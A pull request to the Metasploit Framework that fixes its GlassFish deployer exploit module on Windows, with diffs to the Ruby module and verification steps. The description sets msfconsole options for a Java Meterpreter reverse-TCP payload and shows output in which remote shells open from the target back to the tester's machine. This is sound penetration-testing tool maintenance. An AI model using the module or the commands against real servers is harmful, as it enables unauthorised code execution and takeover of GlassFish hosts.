### PR TITLE
Fix #7247, Glassfish failing to upload the war file on Windows setups

### DIFF
--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -63,17 +63,14 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   # Send GET or POST request, and return the response
   #
-  def send_glassfish_request(path, method, session='', data=nil, ctype=nil, new_headers={})
+  def send_glassfish_request(path, method, session='', data=nil, ctype=nil)
     headers = {}
     headers['Cookie'] = "JSESSIONID=#{session}" unless session.blank?
     headers['Content-Type'] = ctype if ctype
     headers['Connection'] = 'keep-alive'
-    headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0'
     headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
     headers['Accept-Language'] = 'en-US,en;q=0.5'
     headers['Accept-Encoding'] = 'gzip, deflate, br'
-
-    headers.merge!(new_headers) unless new_headers.empty?
 
     res = send_request_raw({
       'uri'     => path,
@@ -622,7 +619,7 @@ class MetasploitModule < Msf::Exploit::Remote
       path << '&bare=false'
     end
 
-    res = send_glassfish_request(path, @verbs['POST'], session, post_data, ctype, {'Referer'=>'https://192.168.146.165:4848/common/applications/uploadFrame.jsf'})
+    res = send_glassfish_request(path, @verbs['POST'], session, post_data, ctype)
 
     # Print upload result
     if res && res.code == 302

--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -63,10 +63,17 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   # Send GET or POST request, and return the response
   #
-  def send_glassfish_request(path, method, session='', data=nil, ctype=nil)
+  def send_glassfish_request(path, method, session='', data=nil, ctype=nil, new_headers={})
     headers = {}
     headers['Cookie'] = "JSESSIONID=#{session}" unless session.blank?
     headers['Content-Type'] = ctype if ctype
+    headers['Connection'] = 'keep-alive'
+    headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0'
+    headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
+    headers['Accept-Language'] = 'en-US,en;q=0.5'
+    headers['Accept-Encoding'] = 'gzip, deflate, br'
+
+    headers.merge!(new_headers) unless new_headers.empty?
 
     res = send_request_raw({
       'uri'     => path,
@@ -475,6 +482,39 @@ class MetasploitModule < Msf::Exploit::Remote
         format(boundary,"form:war:psection:enableProp:sun_checkbox" + id7.to_s,"true"),
         format(boundary,"form:war:psection:enableProp:sun_checkbox" + id8.to_s,"true"),
         format(boundary,"form:war:psection:enableProp:sun_checkbox" + id9.to_s,"true"),
+        format(boundary,"form:other:psection:descriptionProp:description", ""),
+        format(boundary,"form:other:psection:librariesProp:library", ""),
+        format(boundary,"form:other:psection:deploymentOrder:deploymentOrder", ""),
+        format(boundary,"form:other:psection:implicitCdi:implicitCdi", "true"),
+        format(boundary,"form:other:psection:enableProp:sun_checkbox44","true"),
+        format(boundary,"form:war:psection:enableProp:sun_checkbox42","true"),
+        format(boundary,"form:other:psection:vsProp:vs",""),
+        format(boundary,"form:rar:psection:implicitCdi:implicitCdi","true"),
+        format(boundary,"form:rar:psection:deploymentOrder:deploymentOrder",""),
+        format(boundary,"form:rar:psection:enableProp:sun_checkbox40","true"),
+        format(boundary,"form:other:psection:nameProp:appName", app_base),
+        format(boundary,"form:rar:psection:nameProp:appName", app_base),
+        format(boundary,"form:jar:psection:nameProp:appName", app_base),
+        format(boundary,"form:ear:psection:nameProp:appName", app_base),
+        format(boundary,"form:ear:psection:descriptionProp:description",""),
+        format(boundary,"form:jar:psection:deploymentOrder:deploymentOrder", ""),
+        format(boundary,"form:jar:psection:implicitCdi:implicitCdi","true"),
+        format(boundary,"form:ear:psection:jw:jwc","true"),
+        format(boundary,"form:ear:psection:vsProp:vs",""),
+        format(boundary,"form:appClient:psection:deploymentOrder:deploymentOrder",""),
+        format(boundary,"form:jar:psection:enableProp:sun_checkbox38","true"),
+        format(boundary,"form:jar:psection:descriptionProp:description", ""),
+        format(boundary,"form:ear:psection:implicitCdi:implicitCdi","true"),
+        format(boundary,"form:appClient:psection:implicitCdi:implicitCdi","true"),
+        format(boundary,"form:ear:psection:enableProp:sun_checkbox36","true"),
+        format(boundary,"form:war:psection:deploymentOrder:deploymentOrder",""),
+        format(boundary,"form:jar:psection:librariesProp:library",""),
+        format(boundary,"form:appClient:psection:jw:jwt","true"),
+        format(boundary,"form:ear:psection:librariesProp:library", ""),
+        format(boundary,"form:sheet1:sun_propertySheetSection23:type:appType","war"),
+        format(boundary,"form:ear:psection:deploymentOrder:deploymentOrder",""),
+        format(boundary,"form:rar:psection:descriptionProp:description",""),
+        format(boundary,"form:war:psection:implicitCdi:implicitCdi","true"),
         format(boundary,"form:war:psection:librariesProp:library"),
         format(boundary,"form:war:psection:descriptionProp:description"),
         format(boundary,"form_hidden","form_hidden"),
@@ -499,7 +539,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_viewstate(body)
-    @vewstate ||= lambda {
       noko = Nokogiri::HTML(body)
       inputs = noko.search('input')
       hidden_inputs = []
@@ -511,7 +550,6 @@ class MetasploitModule < Msf::Exploit::Remote
       end
 
       ''
-    }.call
   end
 
   #
@@ -584,10 +622,10 @@ class MetasploitModule < Msf::Exploit::Remote
       path << '&bare=false'
     end
 
-    res = send_glassfish_request(path, @verbs['POST'], session, post_data, ctype)
+    res = send_glassfish_request(path, @verbs['POST'], session, post_data, ctype, {'Referer'=>'https://192.168.146.165:4848/common/applications/uploadFrame.jsf'})
 
     # Print upload result
-    if res.code == 302
+    if res && res.code == 302
       print_status("Successfully uploaded")
     else
       print_error("Error uploading #{res.code}")


### PR DESCRIPTION
# What This Patch Does

This patch fixes a problem in exploits/multi/http/glassfish_deployer. On Windows setups, the Glassfish module fails to upload the war file due to some missing fields in the HTTP POST request. However, this does not actually affect Linux setups even with the same Java version or GlassFish version.

Fix #7247
# Verification for Linux
- [x] Get a clean [Ubuntu box](http://www.ubuntu.com/download)
- [x] On the Ubuntu box, install Java like this: `sudo apt-get install default-jdk`, this should get you JDK8.
- [x] Download [GlassFish 4.0](http://download.java.net/glassfish/4.0/release/glassfish-4.0.zip)
- [x] Unzip glassfish-4.0, navigate to the bin directory, and then start `asadmin`
- [x] In the asadmin console, do `start-domain domain1`. This will start GlassFish.
- [x] Still on the Ubuntu box, open http://localhost:4848 with a browser
- [x] On on the left menu, click on "Domain"
- [x] On the right, click on "Administrator password"
- [x] Set a new password for admin
- [x] On the left menu, click on "server (Admin server)"
- [x] On the right, click on the "Secure Administrator" button
- [x] Click on "Enable Secure Admin"
- [x] You will have to wait for up to a minute to make sure Glassfish is up and running again. You can check this by checking port 4848.

At this point, you are ready to test the module:
- [x] Start msfconsole
- [x] Do: `use exploit/multi/http/glassfish_deployer`
- [x] Do: `set RHOST [IP to GlassFish]`
- [x] Do: `set PASSWORD [password to admin]`
- [x] Do: `set SSL true`
- [x] Do: `set target 1`
- [x] Do: `set payload java/meterpreter/reverse_tcp`
- [x] Do: `set LHOST [YOUR IP ADDRESS]`
- [x] Do: `exploit`
- [x] You should get a session like the following:

```
msf exploit(glassfish_deployer) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Glassfish edition: GlassFish Server Open Source Edition  4.0
[*] Trying to login as admin:sploit
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /goTKJKUgGDWQ59unsbqG0g0W9a9a/ba05giTjZqnIEGi.jsp...
[*] Sending stage (46112 bytes) to 192.168.146.174
[*] Meterpreter session 4 opened (192.168.146.1:4444 -> 192.168.146.174:38476) at 2016-08-30 16:06:45 -0500
[*] Getting information to undeploy...
[*] Undeploying goTKJKUgGDWQ59unsbqG0g0W9a9a...
[*] Sending stage (46112 bytes) to 192.168.146.174
[*] Meterpreter session 5 opened (192.168.146.1:4444 -> 192.168.146.174:38402) at 2016-08-30 16:07:04 -0500
[*] Undeployment complete.

meterpreter >
```
# Verification for Windows
- [x] Get a Windows 7 box
- [x] Install Java: http://download.oracle.com/otn-pub/java/jdk/8u101-b13/jdk-8u101-windows-i586.exe?AuthParam=1472235169_3aabd6e7d83a0093feb195ec4351bda4
- [x] Download [GlassFish 4.1](http://download.java.net/glassfish/4.1/release/glassfish-4.1.zip)
- [x] Unzip glassfish-4.1, navigate to the bin directory, and then start `asadmin.bat`
- [x] In the asadmin console, do `start-domain domain1`. This will start GlassFish.
- [x] Still on the Windows box, open http://localhost:4848 with a browser
- [x] On on the left menu, click on "Domain"
- [x] On the right, click on "Administrator password"
- [x] Set a new password for admin
- [x] On the left menu, click on "server (Admin server)"
- [x] On the right, click on the "Secure Administrator" button
- [x] Click on "Enable Secure Admin"
- [x] You will have to wait for up to a minute to make sure Glassfish is up and running again. You can check this by checking port 4848.

And then at that point, you are ready to test the module:
- [x] Start msfconsole
- [x] Do: `use exploit/multi/http/glassfish_deployer`
- [x] Do: `set RHOST [IP to GlassFish]`
- [x] Do: `set PASSWORD [password to admin]`
- [x] Do: `set SSL true`
- [x] Do: `set target 1`
- [x] Do: `set payload java/meterpreter/reverse_tcp`
- [x] Do: `set LHOST [YOUR IP ADDRESS]`
- [x] Do: `exploit`
- [x] You should get a session like the following:

```
msf exploit(glassfish_deployer) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Glassfish edition: GlassFish Server Open Source Edition  4.1
[*] Trying to login as admin:sploit
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /jUYou3/eukJz1.jsp...
[*] Sending stage (46112 bytes) to 192.168.146.165
[*] Meterpreter session 6 opened (192.168.146.1:4444 -> 192.168.146.165:55916) at 2016-08-30 16:14:05 -0500
 [*] Getting information to undeploy...
[*] Undeploying jUYou3...
[*] Undeployment complete.

meterpreter > 
```
